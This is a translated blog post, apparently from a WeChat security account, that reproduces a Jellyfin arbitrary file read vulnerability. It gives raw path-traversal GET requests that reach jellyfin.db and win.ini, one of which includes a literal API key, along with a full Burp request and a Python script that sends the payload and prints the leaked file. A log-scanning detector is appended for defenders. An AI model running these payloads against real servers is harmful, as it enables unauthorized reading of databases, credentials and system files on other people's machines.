Jellyfin Arbitrary File Read Reproduction


POC:

GET /Audio/anything/hls/..\data\jellyfin.db/stream.mp3/ HTTP/1.1
GET /Videos/anything/hls/m/..\data\jellyfin.db HTTP/1.1
GET /Videos/anything/hls/..\data\jellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1

Accessing the PoC directly:

Burp:

Full request:

GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Writing a script:

Script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Jellyfin arbitrary file read
referer: Jellyfin arbitrary file read  IP:port/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
author: thelostworld
description: Jellyfin arbitrary file read.
Disclaimer: the security tools and programs (methods) provided by this site may be offensive in nature and are for security research and teaching only; use at your own risk!
'''
import random
import sys
import warnings
from urllib import parse

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ANSI colour codes
W = '\033[0m'
G = '\033[1;32m'
R = '\033[1;31m'
O = '\033[1;33m'
B = '\033[1;34m'


# Random User-Agent
def get_ua():
    first_num = random.randint(55, 62)
    third_num = random.randint(0, 3200)
    fourth_num = random.randint(0, 140)
    os_type = [
        '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
        '(Macintosh; Intel Mac OS X 10_12_6)'
    ]
    chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

    ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'])
    return ua


def run(url):
    # result[0] is the tested URL; result[1] is '存在' (vulnerable) or '不存在' (not vulnerable)
    result = ['', '不存在']
    url = parse.urlparse(url)
    vulnurl = url.scheme + '://' + url.netloc + '/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/'
    try:
        headers = {'User-Agent': get_ua()}
        req = requests.get(vulnurl, headers=headers, timeout=1, verify=False)
        # A win.ini response contains the strings "font" and "file"
        if req.status_code == 200 and "font" in req.text and "file" in req.text:
            result[1] = '存在'
            result[0] = vulnurl
            print(result)
            print(req.text)
        else:
            result[1] = '不存在'
    except requests.RequestException:
        result[1] = '不存在'
    return result


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    if len(sys.argv) != 2:
        sys.exit('usage: {} http://IP:port'.format(sys.argv[0]))
    testVuln = run(sys.argv[1])
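For the detection side, the following added example (not part of the original article and not Jellyfin code) scans access-log lines for the request shapes shown in the PoC above: a ".." segment, raw or %5C-encoded, on the /Audio/.../hls/ and /Videos/.../hls/ routes. The combined log format, the function names and every sample line are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote

# Routes used by the PoC requests on this page: /Audio/<id>/hls/... and /Videos/<id>/hls/...
HLS_ROUTE = re.compile(r"^/(audio|videos)/[^/]+/hls/", re.IGNORECASE)
# A ".." path segment bounded by "/" or "\" (so "intro..final" does not match)
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Request field of a common/combined-format access log line (assumed log format)
REQUEST_FIELD = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def decode_path(target, rounds=3):
    """Drop the query string, then percent-decode until the path stops changing."""
    path = target.split("?", 1)[0]
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_hls_traversal(target):
    """True when an HLS route carries a '..' segment after decoding (%5C becomes a backslash)."""
    path = decode_path(target)
    return bool(HLS_ROUTE.match(path) and TRAVERSAL.search(path))


def scan(lines):
    """Return (line_number, request_target) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_FIELD.search(line)
        if match and is_hls_traversal(match.group("target")):
            hits.append((number, match.group("target")))
    return hits


# Constructed sample log lines (documentation IP ranges, made-up timestamps and sizes)
SAMPLE_LOG = [
    r'192.0.2.10 - - [01/Jan/2021:10:00:01 +0000] "GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1" 200 92',
    r'192.0.2.10 - - [01/Jan/2021:10:00:02 +0000] "GET /Videos/anything/hls/m/..\data\jellyfin.db HTTP/1.1" 200 4096',
    r'192.0.2.10 - - [01/Jan/2021:10:00:03 +0000] "GET /Videos/anything/hls/..\data\jellyfin.db/stream.m3u8/?api_key=REDACTED HTTP/1.1" 200 4096',
    r'198.51.100.7 - - [01/Jan/2021:10:05:00 +0000] "GET /Videos/abc123/hls/intro..final/stream.m3u8 HTTP/1.1" 200 830',
    r'198.51.100.7 - - [01/Jan/2021:10:05:01 +0000] "GET /Audio/abc123/hls/main/stream.mp3 HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, target in scan(SAMPLE_LOG):
        print(f"line {number}: path traversal on HLS route: {target}")
```

A 200 status on a flagged line means the server answered the traversal request, so those lines are the ones to triage first.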




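Disclaimer: The security tools and programs (methods) provided by this site may be offensive in nature and are for security research and teaching only; use at your own risk!

Reprint notice: Copyright belongs to the author. For commercial reprints, contact the author for authorization; for non-commercial reprints, cite the source.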



This article was first published on the WeChat official account (thelostworld): Jellyfin Arbitrary File Read Reproduction
